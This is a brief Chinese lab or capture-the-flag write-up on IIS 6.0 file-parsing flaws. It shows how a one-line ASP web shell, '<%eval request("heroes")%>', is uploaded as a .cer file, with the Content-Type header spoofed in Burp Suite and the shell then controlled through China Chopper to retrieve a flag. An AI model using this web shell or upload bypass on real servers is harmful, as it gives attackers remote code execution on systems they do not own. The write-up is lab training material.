文件上传靶场—IIS6.0解析漏洞(一)

IIS6.0 有以下文件解析漏洞：

• 在文件夹为 asp, asa 内的所有文件都会被当成asp脚本进行解析;
• 文件名如：xxx.asp;yyy.jpg 的文件，会忽略分号后面的后缀，将该文件当成asp脚本进行解析
• asa、cer、cdx 也会被当成asp脚本进行解析

查看源码：

image.png

可以看到支持上传的后缀名有：gif、jpeg、jpg、png、asa、cer、cdx，但同时还要满足http请求头Content-Type的值为 image/jpg 、image/png 等图片类型。

这里我就直接将一句话木马保存为 xxx.cer 文件的方式来做。

我的一句话木马内容为：

<%eval request("heroes")%>

保存为 ladybird251.cer ，上传后先用Burpsuite修改Content-Type的值为 image/jpeg 如下：

image.png

上传结果如下：

image.png

然后用菜刀连接：

image.png

进入保存上传文件的目录中找到flag文件：

image.png